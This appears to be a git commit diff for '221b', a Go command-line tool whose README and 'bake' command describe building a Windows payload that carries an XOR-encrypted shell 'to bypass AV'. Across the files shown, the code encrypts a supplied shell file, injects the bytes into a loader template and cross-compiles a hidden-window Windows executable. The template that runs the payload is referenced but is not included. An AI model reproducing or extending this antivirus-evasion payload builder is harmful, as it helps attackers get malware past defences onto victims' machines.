feat: add project v0.0.1 (#1)

* feat: add project v0.0.1

Signed-off-by: Vasek - Tom C <[email protected]>

* fix: project output path

Signed-off-by: Vasek - Tom C <[email protected]>

---------

Signed-off-by: Vasek - Tom C <[email protected]>

Author: TomChv

.gitignore

@@ -19,3 +19,7 @@
 
 # Go workspace file
 go.work
+
+221b
+
+.idea

README.md

@@ -1 +1,47 @@
-# 221b
+# 221b
+
+## Getting started
+
+### 1. Compile binary
+
+```shell
+go build -o 221b ./main.go
+```
+
+### 2. Copy binary to path
+
+```shell
+sudo mv 221b /usr/local/bin/
+```
+
+### 3. Exec 221b
+
+```shell
+221b bake -k <key> -s <shell>
+```
+
+## Usage
+
+```shell
+221b help bake
+Build a windows payload with the given shell encrypted in it to bypass AV
+
+Usage:
+  221b bake [flags]
+
+Flags:
+  -h, --help               help for bake
+  -k, --key string         key to use for the xor
+  -s, --shellpath string   Path to the shell scrypt
+
+Global Flags:
+      --debug   activate debug mode
+```
+
+## Example
+
+```shell
+221b bake -k shflfhje -s test.sh
+go: added golang.org/x/sys v0.10.0
+[+] file compiled to ./test.exe
+```

cli/bake.go

@@ -0,0 +1,68 @@
+package cli
+
+import (
+	"fmt"
+	"github.com/spf13/cobra"
+	"os"
+
+	"github.com/cmepw/221b/encryption"
+	"github.com/cmepw/221b/loader"
+	"github.com/cmepw/221b/logger"
+)
+
+var (
+	shellpath string
+	key       string
+)
+
+var (
+	ErrMissingShellpath = fmt.Errorf("missing shellpath argument")
+	ErrMissingKey       = fmt.Errorf("missing key argument")
+)
+
+var bake = &cobra.Command{
+	Use:   "bake",
+	Short: "Build a windows payload with the given shell encrypted in it to bypass AV",
+	Run: func(cmd *cobra.Command, args []string) {
+		if shellpath == "" {
+			logger.Fatal(ErrMissingShellpath)
+		}
+
+		if key == "" {
+			logger.Fatal(ErrMissingKey)
+		}
+
+		logger.Debug(fmt.Sprintf("baking %s with key %s", shellpath, key))
+
+		logger.Debug(fmt.Sprintf("reading %s", shellpath))
+		file, err := os.ReadFile(shellpath)
+		if err != nil {
+			logger.Fatal(err)
+		}
+
+		logger.Debug(fmt.Sprintf("encrypting %s", shellpath))
+		encryptedShell := encryption.Xor.Encrypt(file, []byte(key))
+
+		logger.Debug(fmt.Sprintf("injecting encrypted shell into payload"))
+
+		xorLoader := loader.NewXorLoader([]byte(key))
+		content, err := xorLoader.Load(encryptedShell)
+		if err != nil {
+			logger.Fatal(err)
+		}
+
+		if logger.DebugMode {
+			logger.Debug("content")
+			fmt.Println(string(content))
+		}
+
+		if err := xorLoader.Compile(shellpath, content); err != nil {
+			logger.Fatal(err)
+		}
+	},
+}
+
+func init() {
+	bake.Flags().StringVarP(&shellpath, "shellpath", "s", "", "Path to the shell scrypt")
+	bake.Flags().StringVarP(&key, "key", "k", "", "key to use for the xor")
+}

cli/cli.go

@@ -0,0 +1,27 @@
+package cli
+
+import (
+	"github.com/spf13/cobra"
+
+	"github.com/cmepw/221b/logger"
+)
+
+var debug bool
+
+var rootCmd = &cobra.Command{
+	Version: "v0.0.1",
+	Use:     "221b",
+	PersistentPreRun: func(_ *cobra.Command, _ []string) {
+		logger.DebugMode = debug
+	},
+}
+
+func Execute() error {
+	return rootCmd.Execute()
+}
+
+func init() {
+	rootCmd.PersistentFlags().BoolVar(&debug, "debug", false, "activate debug mode")
+
+	rootCmd.AddCommand(bake)
+}

encryption/encryption.go

@@ -0,0 +1,6 @@
+package encryption
+
+type Encryption interface {
+	Decrypt(content, key []byte) []byte
+	Encrypt(content, key []byte) []byte
+}

encryption/xor.go

@@ -0,0 +1,23 @@
+package encryption
+
+var Xor = xor{}
+
+type xor struct{}
+
+func (x xor) Decrypt(content, key []byte) []byte {
+	keyLen := len(key)
+
+	for i := 0; i < len(content); i++ {
+		content[i] ^= key[i%keyLen]
+	}
+	return content
+}
+
+func (x xor) Encrypt(content, key []byte) []byte {
+	keyLen := len(key)
+
+	for i := 0; i < len(content); i++ {
+		content[i] ^= key[i%keyLen]
+	}
+	return content
+}

go.mod

@@ -0,0 +1,10 @@
+module github.com/cmepw/221b
+
+go 1.20
+
+require github.com/spf13/cobra v1.7.0
+
+require (
+	github.com/inconshreveable/mousetrap v1.1.0 // indirect
+	github.com/spf13/pflag v1.0.5 // indirect
+)

go.sum

@@ -0,0 +1,10 @@
+github.com/cpuguy83/go-md2man/v2 v2.0.2/go.mod h1:tgQtvFlXSQOSOSIRvRPT7W67SCa46tRHOmNcaadrF8o=
+github.com/inconshreveable/mousetrap v1.1.0 h1:wN+x4NVGpMsO7ErUn/mUI3vEoE6Jt13X2s0bqwp9tc8=
+github.com/inconshreveable/mousetrap v1.1.0/go.mod h1:vpF70FUmC8bwa3OWnCshd2FqLfsEA9PFc4w1p2J65bw=
+github.com/russross/blackfriday/v2 v2.1.0/go.mod h1:+Rmxgy9KzJVeS9/2gXHxylqXiyQDYRxCVz55jmeOWTM=
+github.com/spf13/cobra v1.7.0 h1:hyqWnYt1ZQShIddO5kBpj3vu05/++x6tJ6dg8EC572I=
+github.com/spf13/cobra v1.7.0/go.mod h1:uLxZILRyS/50WlhOIKD7W6V5bgeIt+4sICxh6uRMrb0=
+github.com/spf13/pflag v1.0.5 h1:iy+VFUOCP1a+8yFto/drg2CJ5u0yRoB7fZw3DKv/JXA=
+github.com/spf13/pflag v1.0.5/go.mod h1:McXfInJRrz4CZXVZOBLb0bTZqETkiAhM9Iw0y3An2Bg=
+gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
+gopkg.in/yaml.v3 v3.0.1/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=

loader/loader.go

@@ -0,0 +1,87 @@
+package loader
+
+import (
+	"fmt"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"strings"
+
+	"github.com/cmepw/221b/logger"
+	"github.com/cmepw/221b/templates"
+)
+
+type Loader interface {
+	Load(content []byte) ([]byte, error)
+	Compile(path string, content []byte) error
+}
+
+type baseLoader struct{}
+
+const (
+	windowsExt = ".exe"
+	tmpFile    = "tmp.go"
+)
+
+func (b baseLoader) Compile(path string, content []byte) error {
+	outputPath := strings.TrimSuffix(filepath.Base(path), filepath.Ext(path)) + windowsExt
+
+	dir := "/tmp/test"
+	if err := os.MkdirAll(dir, 0750); err != nil {
+		logger.Error(fmt.Errorf("could not create temporary directory"))
+		return err
+	}
+
+	defer func() {
+		_ = os.RemoveAll(dir)
+	}()
+
+	// Set environment
+	logger.Debug("write content to temporary file")
+	if err := os.WriteFile(filepath.Join(dir, tmpFile), content, 0666); err != nil {
+		logger.Error(fmt.Errorf("could not write tmp file"))
+		return err
+	}
+
+	if err := os.WriteFile(filepath.Join(dir, "go.mod"), []byte(templates.GoMod), 0666); err != nil {
+		logger.Error(fmt.Errorf("could not write tmp go.mod file"))
+		return err
+	}
+
+	initCmd := exec.Command("go", "get", "-u", "golang.org/x/sys/windows")
+	initCmd.Dir = dir
+	initCmd.Stderr = os.Stderr
+	initCmd.Env = append(os.Environ(), "GOOS=windows", "GOARCH=amd64")
+	if err := initCmd.Run(); err != nil {
+		logger.Error(fmt.Errorf("could not install dependency"))
+		return err
+	}
+
+	logger.Debug("dependency installed")
+
+	pwd, err := os.Getwd()
+	if err != nil {
+		return err
+	}
+
+	buildCmd := exec.Command(
+		"go",
+		"build",
+		"-ldflags",
+		"-s -w -H=windowsgui",
+		"-o",
+		filepath.Join(pwd, outputPath),
+		filepath.Join(dir, tmpFile),
+	)
+	buildCmd.Env = append(os.Environ(), "GOOS=windows", "GOARCH=amd64")
+	buildCmd.Stderr = os.Stderr
+	buildCmd.Dir = dir
+
+	if err := buildCmd.Run(); err != nil {
+		logger.Error(fmt.Errorf("failed to compile"))
+		return err
+	}
+
+	logger.Info(fmt.Sprintf("file compiled to %s", filepath.Join(pwd, outputPath)))
+	return nil
+}

loader/xor.go

@@ -0,0 +1,44 @@
+package loader
+
+import (
+	"bytes"
+	"fmt"
+	"strings"
+	"text/template"
+
+	"github.com/cmepw/221b/templates"
+)
+
+type Xor struct {
+	key []byte
+	baseLoader
+}
+
+func NewXorLoader(key []byte) *Xor {
+	return &Xor{key: key}
+}
+
+func (x Xor) Load(content []byte) ([]byte, error) {
+	tmpl, err := template.New("loader").Funcs(template.FuncMap{
+		"key": func() string {
+			return string(x.key)
+		},
+		"shellcode": func() string {
+			result := []string{}
+
+			for _, b := range content {
+				result = append(result, fmt.Sprintf("0x%02x", b))
+			}
+
+			return strings.Join(result, ", ") + ","
+		},
+	}).Parse(templates.XorTmpl)
+	if err != nil {
+		return nil, err
+	}
+
+	result := new(bytes.Buffer)
+	err = tmpl.Execute(result, nil)
+
+	return result.Bytes(), err
+}

logger/logger.go

@@ -0,0 +1,31 @@
+package logger
+
+import (
+	"fmt"
+	"os"
+)
+
+var DebugMode = false
+
+func Debug(msg string) {
+	if DebugMode {
+		fmt.Printf("[*] %s\n", msg)
+	}
+}
+
+func Info(msg string) {
+	fmt.Printf("[+] %s\n", msg)
+}
+
+func Warn(msg string) {
+	fmt.Printf("[^] %s\n", msg)
+}
+
+func Error(err error) {
+	fmt.Printf("[!] %v\n", err)
+}
+
+func Fatal(err error) {
+	Error(err)
+	os.Exit(1)
+}

main.go

@@ -0,0 +1,13 @@
+package main
+
+import (
+	"log"
+
+	"github.com/cmepw/221b/cli"
+)
+
+func main() {
+	if err := cli.Execute(); err != nil {
+		log.Fatal(err)
+	}
+}

templates/goMod.go

@@ -0,0 +1,7 @@
+package templates
+
+var GoMod = `
+module github.com/cmepw/221b-context
+
+go 1.20
+`